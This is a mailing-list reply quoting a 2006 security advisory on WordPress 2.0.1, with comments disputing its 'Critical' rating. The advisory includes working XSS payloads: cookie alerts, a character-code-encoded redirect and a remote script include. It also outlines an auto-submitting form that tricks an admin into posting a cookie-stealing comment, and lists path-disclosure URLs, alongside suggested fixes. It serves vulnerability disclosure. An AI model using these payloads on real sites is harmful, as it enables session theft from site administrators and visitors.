Re: WordPress 2.0.1 Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
> Risk: Critical! Impact: XSS, Full Path Disclosure, Directory
> Listing
Here a critical bug is an arbitrary command execution, account ownage, etc
an XSS isn't at all critical...
> <+ Full path disclosure & Directory listing +> When I discovered
> this bug, I reported it to some pepople before public disclosure, I
> was noticed that this isn't new and I decided to look why they
> haven't patch this bug.
so it's not that critical, medium but nothing critical ...
Javor Ninov wrote:
> wp-content/ is also prone to directory listing
>
>
> Javor Ninov aka DrFrancky
>
> k4p0k4p0@xxxxxxxxxxx wrote:
>> /*
>> ---------------------------------------------------------------
>> [N]eo [S]ecurity [T]eam [NST]® WordPress 2.0.1 Multiple
>> Vulnerabilities
>> ---------------------------------------------------------------
>> Program : WordPress 2.0 Homepage: http://www.wordpress.org
>> Vulnerable Versions: WordPress 2.0.1 & lower ones Risk: Critical!
>> Impact: XSS, Full Path Disclosure, Directory Listing
>>
>> -> WordPress 2.0.1 Multiple Vulnerabilities <-
>> ---------------------------------------------------------------
>>
>> - Description
>> ---------------------------------------------------------------
>> WordPress is a state-of-the-art semantic personal publishing
>> platform with a focus on aesthetics, web standards, and
>> usability. What a mouthful. WordPress is both free and priceless
>> at the same time.
>>
>> - Tested
>> ---------------------------------------------------------------
>> Tested in localhost & many blogs
>>
>> - Bug
>> ---------------------------------------------------------------
>> The vendor was contacted about some other coding errors that are
>> not described here, the vendor was noticed about these bugs when
>> this advisory was published.
>>
>> <+ Multiple XSS +> There're multiple XSS in `post comment':
>>
>> [1] `name' variable is not filtered when it's assigned to `value'
>> on the `<input>' in the form when the comment it's posted. [2]
>> Happends the same as [1] with `website' variable. [3] `comment',
>> this variable only filtered " and ' chars, this makes possible to
>> use < and >, thus this permit an attacker to inject any HTML (or
>> script) code that he/she want but without any " or ' character,
>> this only happends if the user that post the comment it's the
>> admin (any registered kind of `user').
>>
>> If you (or victim) is a unregistered user, you can use " and ' in
>> your HTML/script Injection using `name' or `website' variables,
>> but if the victim is the admin or a registered user these 2
>> fields described above aren't availabe in the form so you cannot
>> even give a value to them. The only remaining option it's to use
>> the `comment' variable but here we have the problem that we
>> cannot use " or ' in HTML/SCRIPT Injected and we have to make the
>> admin to post the comment (POST method).
>>
>> <+ Full path disclosure & Directory listing +> When I discovered
>> this bug, I reported it to some pepople before public disclosure,
>> I was noticed that this isn't new and I decided to look why they
>> haven't patch this bug.
>>
>> As this bug it isn't patched yet, I tryed to know why and I found
>> something like this in their forum (I don't know if the person
>> that posted this was the admin but it gives the explanation):
>> (Something like the following, it's not textual). `... these bugs
>> are caused by badly configured .ini file, it's not a bug
>> generated by the script so it cannot be accepted as a bug of
>> WordPress...'. This is not an acceptable answer, if you think it
>> is, a bug caused because of register_globals is Off it's .ini
>> fault and not the script, they have to be kidding, if they want
>> to make good software, they have to make as far as the language
>> can, to prevent all bugs.
>>
>> There're multiple files that don't check if they are been call
>> directly. This is a problem because they expect that functions
>> that the script is going to be called to be declared. This kind
>> of bug it's taken as a Low Risk bug, but it can help to future
>> attacks.
>>
>> - Exploit
>> ---------------------------------------------------------------
>> -- Cross Site Scripting (XSS) PoC: [1] Post a comment with the
>> following values (as unregistered user): (No possible profit)
>>
>> Name : "><script>alert("WordPress PoC from");</script> Mail :
>> neosecurityteam@xxxxxxx Website:
>> "><script>alert("[N]eo[S]ecurity[T]eam
>> www.neosecurityteam.net");</script> Comment:
>> www.neosecurityteam.net/foro/
>>
>> The injected HTML code only affects the user that posted it, not
>> others.
>>
>> [2] This way it's more intresting and useful. In this case the
>> HTML Injected will stay in the board affecting each person who
>> see it. But we have two problems: [I ]- This comment must be
>> posted by the admin [II]- We only can use the `comment' field,
>> because the admin form to make the comment doesn't need the
>> `name' or `website'. Also the injected code cannot have any " or
>> ' chars.
>>
>> Here are my solutions: [I ]- We cannot give to the admin a
>> `malicius' URL to steal the cookie because it isn't via GET, it's
>> via POST. So the solution it's to make a copy form of the real
>> one and set the default values to the corresonding field
>> (`comment') to make the stealing. Also make the form submit
>> itself when the page loads. Thus, we give the admin the URL of
>> this form and he/she will post the comment with the values we set
>> before. :) [II]- We can only use this field to make the
>> injection, the `big' problem its that we cannot use " or ' chars
>> wich means that something like window.location =
>> "http://www.google.com.uy"; won't work.
>>
>> Here are some real examples:
>>
>> - <script>alert(document.cookie)</script> -
>> <script>alert(String.fromCharCode(80,111,67,32,111,102,32,87,111,114,
>>
>> 100,80,114,101,115,115,32,98,121,32,75,52,80,48,32,102,114,111,109,32,
>> 78,83,84))</script> - <script
>> src=http://www.neosecurityteam.net></script> -
>> <script>document.location =
>> String.fromCharCode(104,116,116,112,58,47,
>> 47,119,119,119,46,110,101,111,115,101,99,117,114,105,116,121,116,101,
>> 97,109,46,110,101,116)</script>
>>
>> As you can see this bug it's exploitable, it's only knowing a bit
>> deeper how to do XSS under some conditions. There're more
>> possibilities than described above, investigate yourself.
>>
>> -- Full path disclosure & Directory Listing Directory Listing:
>> www.victim.com/wordpress/wp-includes/
>>
>> Full path disclosure:
>> www.victim.com/wordpress/wp-includes/default-filters.php
>> www.victim.com/wordpress/wp-includes/template-loader.php
>> www.victim.com/wordpress/wp-admin/edit-form-advanced.php
>> www.victim.com/wordpress/wp-admin/edit-form-comment.php
>> www.victim.com/wordpress/wp-includes/rss-functions.php
>> www.victim.com/wordpress/wp-admin/admin-functions.php
>> www.victim.com/wordpress/wp-admin/edit-link-form.php
>> www.victim.com/wordpress/wp-admin/edit-page-form.php
>> www.victim.com/wordpress/wp-admin/admin-footer.php
>> www.victim.com/wordpress/wp-admin/menu-header.php
>> www.victim.com/wordpress/wp-includes/locale.php
>> www.victim.com/wordpress/wp-admin/edit-form.php
>> www.victim.com/wordpress/wp-includes/wp-db.php
>> www.victim.com/wordpress/wp-includes/kses.php
>> www.victim.com/wordpress/wp-includes/vars.php
>> www.victim.com/wordpress/wp-admin/menu.php
>> www.victim.com/wordpress/wp-settings.php
>>
>> - Solutions
>> ---------------------------------------------------------------
>> <+ Cross Site Scripting (XSS) +> Change lines ~21 of
>> 'wp-comments-post.php' to: $comment_author =
>> htmlentities(trim($_POST['author'])); $comment_author_email =
>> htmlentities(trim($_POST['email'])); $comment_author_url =
>> htmlentities(trim($_POST['url'])); $comment_content =
>> htmlentities(trim($_POST['comment']));
>>
>> <+ Full Path Disclosure & Directory Listing +> In the first line
>> of each vulnerable file you should write: if
>> (eregi('name_of_the_file.php', $_SERVER['PHP_SELF'])) die('You
>> are not allowed to see this page directly');
>>
>> - References
>> ---------------------------------------------------------------
>> http://NeoSecurityTeam.net/advisories/Advisory-17.txt
>>
>> - Credits
>> --------------------------------------------------------------
>> Discovered by K4P0-> k4p0k4p0[at]hotmail[dot]com
>>
>> [N]eo [S]ecurity [T]eam [NST]® - http://NeoSecurityTeam.net/
>>
>> Irc.InfoGroup.cl #neosecurityteam Questions? (Eng | Spa) ->
>> http://NeoSecurityTeam.net/foro/
>>
>> - Greets
>> ---------------------------------------------------------------
>> Paisterist HaCkZaTaN Link Daemon21 erg0t NST Comunity!
>>
>> @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
>> '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@@@@'''''@@@
>> '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ */
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
iQIVAwUBRAYZ16+LRXunxpxfAQLBShAAxf21wL1qEpzb1ATERVMwvMoGPKC9PQ3D
CdOZ9Sp0RTZTxLvpWj/6Q3dWp1jn4JB4feXOsD2r55Z45APHcsFNVlUpz/NkrSE+
mEdcj6BhvYq5vPCN8MJbI89L5x5wovKugPA3LGeOFXDnkaCJQXjXJskHV9uJvVLw
Ko1qfr7hmChLWG/1U/4Dfo4Mndq8kw0S7AIwoEMNogd0wgO/sDYrCXyRm6XIGtRf
BM33Gai17YSPi0TlJe4X8+Cyr0ibEKbmJVCJ1cm/s1bQDYHrct0fMb/zRzwczWWe
oSOXK6rM8COQMh9MS+nlCsLIZvkir7Ztp486MOjZ7rkNKIb5q9TIYHzg7UsOh7yM
QOz1tI26Apxy0w1dNNX/fyKAhHMmcMtI1jfMOC/Bo+3L+JZedcCTo4uHkp9xzOkg
k2I8j/QvScdSF+iBueIe9QZQDfd7n5GuoRDpMn47FOAOmMonx4qD+mOvFwPFPuZv
sbitRSEa5BQTYCU5CRflalzEX+H5F9aCrMqQGcRhlygC+ONXDuTCVroR9Cticxbt
QkIw6kgXd9ndUtiaVjG0gObB72NQxh/CMlQCClgZwhgHFSVeHbxUhlofwytjO0Y3
/ss9ehywwLTirq90jjEN51Q6Auun3YXeXxGH5XBkMI9gxo2Wj4x5TudpeS6cJTji
N8IhY+gLiQA=
=LKCE
-----END PGP SIGNATURE-----